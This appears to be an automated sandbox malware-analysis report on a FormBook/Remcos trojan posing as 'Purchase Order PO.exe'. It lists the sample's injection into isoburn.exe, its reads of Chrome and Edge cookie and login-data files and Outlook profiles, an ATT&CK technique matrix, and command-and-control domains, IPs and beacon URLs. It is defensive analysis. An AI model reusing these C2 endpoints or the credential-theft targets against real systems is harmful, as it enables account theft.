                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.Purchase Order PO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Purchase Order PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4172302652.0000000005670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4170584214.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4170538455.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2134871373.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2135061100.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.Purchase Order PO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Purchase Order PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4172302652.0000000005670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4170584214.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4170538455.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2134871373.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2135061100.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                412
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                121
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism
                1
                Disable or Modify Tools
                LSASS Memory2
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                41
                Virtualization/Sandbox Evasion
                Security Account Manager41
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                5
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture5
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism
                Cached Domain Credentials113
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560968 Sample: Purchase Order PO.exe Startdate: 22/11/2024 Architecture: WINDOWS Score: 100 31 www.cyperla.xyz 2->31 33 www.070002018.xyz 2->33 35 16 other IPs or domains 2->35 45 Antivirus / Scanner detection for submitted sample 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 53 5 other signatures 2->53 10 Purchase Order PO.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 33->51 process4 file5 29 C:\Users\user\...\Purchase Order PO.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 Purchase Order PO.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 QfgdvbjddZ.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 isoburn.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 QfgdvbjddZ.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.070002018.xyz 161.97.142.144, 49930, 49936, 49944 CONTABODE United States 23->37 39 cyperla.xyz 31.186.11.114, 49743, 80 BETAINTERNATIONALTR Turkey 23->39 41 10 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Purchase Order PO.exe66%ReversingLabsByteCode-MSIL.Trojan.Remcos
                Purchase Order PO.exe100%AviraHEUR/AGEN.1309540
                Purchase Order PO.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.smartcongress.net/qtfx/?Mr60=KdNk/QG/ntQJ0Ylt7Lyc3znBwC3jfRDsxCMWqIa/89W9m0NHjjmW45E2UxezVHfL5+2nDpZVQ4VEoa9MycOLMlSLf1n7d0xHEmolRusqu1Y7m0apztprjxI=&o6=SpTPojpx7H0%Avira URL Cloudsafe
                http://www.yc791022.asia/wu7k/0%Avira URL Cloudsafe
                http://www.dietcoffee.online/dm4p/?o6=SpTPojpx7H&Mr60=nAmjXBwFyC120iWGDF5QEkfQ4V9pq4qW/X6vA0SQviJnmQOR7pbzII6Li/fXSuLSC3cdwp3L3c1awzkuuw4A1F2MgfpbEGtSAoSHmNs0Z+rY9P6APqFlZ34=0%Avira URL Cloudsafe
                http://www.bienmaigrir.info/7yhf/0%Avira URL Cloudsafe
                http://www.smartcongress.net/qtfx/0%Avira URL Cloudsafe
                http://www.madhf.tech/6ou6/0%Avira URL Cloudsafe
                http://www.bser101pp.buzz/v89f/?Mr60=vR3kWP+v98PFeIQUj3bnjAJ1ckGUCiAryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k2Lg1hTzUbXWqWgu/JIX+7IudMx93vwrkJY0=&o6=SpTPojpx7H0%Avira URL Cloudsafe
                https://www.cstrategy.online/qx5d/?Mr60=IyUQrkKyuirfHSYuUsN10%Avira URL Cloudsafe
                http://www.dietcoffee.online/dm4p/0%Avira URL Cloudsafe
                http://www.cyperla.xyz/qygv/?o6=SpTPojpx7H&Mr60=PNgLNtFNavTWVACgmh5xCzkhObl4Vn/3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4Wmu6EeWsOoRA0CokgLA8hMNXivrFO8nzFLsU=0%Avira URL Cloudsafe
                http://www.070002018.xyz/6m2n/0%Avira URL Cloudsafe
                http://www.bser101pp.buzz/v89f/0%Avira URL Cloudsafe
                http://www.madhf.tech/6ou6/?o6=SpTPojpx7H&Mr60=We72k2U8RqyHNx9ftVgFe72GQMu4iuXnCau05KQMUjWmq73IzupFd0%Avira URL Cloudsafe
                http://www.jalan2.online/ykgd/0%Avira URL Cloudsafe
                http://www.goldstarfootwear.shop/8m07/0%Avira URL Cloudsafe
                http://www.smartcongress.net0%Avira URL Cloudsafe
